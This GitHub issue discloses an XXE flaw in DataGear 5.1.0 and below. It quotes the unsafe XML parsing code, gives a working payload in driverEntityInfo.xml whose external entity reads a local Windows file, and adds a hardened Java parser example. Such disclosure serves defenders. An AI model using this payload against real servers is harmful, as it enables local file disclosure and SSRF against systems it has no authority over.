XML External Entity (XXE) Vulnerability in /driverEntity/uploadImportFile #34

Open
Z4cSec opened this issue Oct 22, 2024 · 2 comments

Z4cSec commented Oct 22, 2024

Description

DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.

DataGear 5.1.0 and below has an XXE vulnerability, which can be exploited to disclose local files in the file system or to perform Server-Side Request Forgery (SSRF).


Unsafe Code

The org/datagear/connection/XmlDriverEntityManager.java#readDriverEntities function parses XML directly without disabling DTD (Document Type Definition) processing, and the XML is controllable, leading to XML External Entity (XXE).

@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
    List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();

    DocumentBuilderFactory documentBuilderFactory;
    DocumentBuilder documentBuilder;
    Document document;

    try
    {
        documentBuilderFactory = DocumentBuilderFactory.newInstance();
        documentBuilder = documentBuilderFactory.newDocumentBuilder();
        document = documentBuilder.parse(new InputSource(in));

Steps to Reproduce

Upload a zip file containing the driverEntityInfo.xml file, with the content of driverEntityInfo.xml as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
    <driver-entity>
        <id>&edward;</id>
        <driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>mysql-jre8</id>
        <driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>oracle</id>
        <driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
    </driver-entity>
</driver-entities>

After sending the request, you can see the returned value after XML parsing.
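A hardened parser setup for the code path reported above, as an added example that is not DataGear's own code or its fix. The class and method names are hypothetical, the sample XML strings are constructed, and the feature URIs assume the JDK's built-in JAXP (Xerces-based) parser.

```java
import java.io.Reader;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedDriverEntityXml {

    // Hypothetical helper: a factory that refuses any DOCTYPE declaration.
    static DocumentBuilderFactory newHardenedFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Primary control: a document carrying <!DOCTYPE ...> fails to parse.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case the DOCTYPE ban is ever relaxed.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // JAXP 1.5 properties: no protocol may be used to fetch DTDs or schemas.
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f;
    }

    static Document parse(Reader in) throws Exception {
        return newHardenedFactory().newDocumentBuilder().parse(new InputSource(in));
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a plain driverEntityInfo.xml and one with a DOCTYPE.
        String benign = "<driver-entities><driver-entity><id>mysql-jre8</id>"
                + "</driver-entity></driver-entities>";
        String withDoctype = "<!DOCTYPE driver-entities ["
                + "<!ENTITY e SYSTEM \"file:///nonexistent\">]>"
                + "<driver-entities><driver-entity><id>&e;</id>"
                + "</driver-entity></driver-entities>";
        Document ok = parse(new StringReader(benign));
        System.out.println("benign root: " + ok.getDocumentElement().getTagName());
        try {
            parse(new StringReader(withDoctype));
            System.out.println("DOCTYPE accepted (parser is NOT hardened)");
        } catch (SAXParseException e) {
            System.out.println("DOCTYPE rejected: " + e.getMessage());
        }
    }
}
```

If a different XML parser implementation is on the classpath, `setFeature` or `setAttribute` may throw for an unsupported name; treat that as a hard failure rather than catching and continuing with an unhardened factory.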


byXewl commented Oct 23, 2024

Why is there no echoed output from the URL request I modified?

Author

Z4cSec commented Oct 23, 2024

> Why is there no echoed output from the URL request I modified?

You need to upload a zip file containing a driverEntityInfo.xml. If the format is incorrect, it will not be parsed.

@Z4cSec Z4cSec closed this as not planned Won't fix, can't repro, duplicate, stale Oct 23, 2024
@Z4cSec Z4cSec reopened this Oct 23, 2024